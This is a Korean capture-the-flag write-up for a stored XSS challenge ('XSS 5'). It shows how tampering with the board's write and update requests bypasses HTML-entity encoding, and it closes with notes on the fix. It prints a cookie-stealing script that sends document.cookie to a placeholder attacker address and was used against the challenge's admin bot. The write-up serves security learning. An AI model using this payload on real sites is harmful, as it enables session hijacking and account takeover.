[SegFault] (XSS) - XSS 5

[SegFault] (XSS)

XSS 5

관리자의 Cookie를 탈취하세요!

문제 파악

본 문제의 경우 XSS의 취약점을 찾고, 관리자 Bot에 해당 링크를 입력하여 공격자 서버로 Cookie 값을 탈취하여 받으면 Flag를 획득할 수 있는 방식으로 이루어져 있다.

하지만 현재 공격자 서버를 갖고 있지 않으므로 RequestBin을 이용하기로 한다.

우선 위의 [관리자 방문 Bot Link]에 접속하면 다음과 같은 URL 입력창을 볼 수 있다.

XSS 취약점을 발견하고 해당 링크를 위의 URL에 입력하면 공격자 서버(RequestBin)로 쿠키 값이 날아오는 방식이다.

이제 아래의 문제 링크에 접속하면 다음과 같은 창이 나온다.

우선 회원가입 후 로그인을 시도해본다.

마이페이지에서는 XSS 취약점이 발견되지 않아 공지사항을 확인해본다.

우선 글쓰기 기능을 확인해본다.

< ' " >

글쓰기 기능에 스크립트에 영향을 줄 수 있는 특수문자 < ' " >에 대하여 확인해본다.

그 결과 위와 같이 제목과 내용 모두에서 HTML Entity가 적용되어 있는 것을 확인할 수 있었다.

 

XSS Point

글쓰기 기능에서는 XSS를 방지하기 위해 HTML Entity 로의 치환이 되고 있다.글의 수정 기능을 확인해 본다.

글의 수정 과정(update_process)에서 Burp를 이용하여 변조하여 넣어준다.

그 후 해당 글에 접근해본 결과 글 수정 과정을 이용하면 이를 우회할 수 있다는 것을 발견하였다.

(확인해본 결과 글 작성 과정에서도 웹 프록시 툴(Burp)를 이용하여 변조해주면 우회가 가능하였다.)

제목 부분에 대해서는 그대로 HTML Entity가 적용되지만, 글의 내용 부분의 HTML Entity가 적용되지 않아 수정하여 입력한 값이 그대로 출력되어 있는 것을 확인할 수 있었다.

---

풀이 과정 (해결 방안)

XSS 취약점이 발견되었으므로 삽입할 페이로드(Payload)를 작성한다.

페이로드 (Payload)

<script>
var cookieData = document.cookie;
var i = new Image();
i.src = "https://공격자 주소/?cookie="+cookieData;
</script>

 

스크립트 삽입

위의 페이로드를 글쓰기 기능, 글 수정 기능에서 내용 부분에 삽입하는 경우 HTML Entity가 적용된다.

하지만 DB 글을 삽입하는 과정, 즉 글쓰기 과정(write_process), 글 수정 과정(update_process)에서 직접적으로 변조하는 경우 우회가 가능하다.

위의 과정 후 해당 글을 읽기 위해 접근하는 경우 내용 부분의 스크립트가 활성화 되어 화면에는 내용이 출력되지 않지만 저장되어 있는 스크립트가 실행되는 것을 확인할 수 있었다.

해당 글의 URL을 관리자 Bot에 보내준다.

탈취된 쿠키(Cookie)가 공격자의 주소(RequestBin)으로 받아와지는 것을 확인할 수 있다.

위와 같이 해당 글에 접근하여 스크립트가 활성화 되어 원하는 flag가 획득되는 것을 확인할 수 있다.

---

취약점에 관한 고찰

본 문제의 경우 일반적인 방식의 글쓰기, 글 수정 기능에서는 HTML Entity가 적용되어 있지만, 해당 글이 삽입되는 과정(process)에서 변조를 하는 경우, HTML Entity로의 변환에 대한 우회가 가능한 점을 이용한다.
클라이언트 측 확인(Client Check)을 하지 않아 생긴 취약점이다.
위의 우회 방법을 통해 응답(Response)에 작성되어 있는 내용이 그대로 출력되는 점을 이용한 Stored XSS 취약점이다.
요청(Request)값을 직접적으로 수정하여 넣더라도 HTML Entity로의 변환 과정을 건너뛰지 못하도록, 변환을 진행하는 위치에 대하여 생각해야 한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영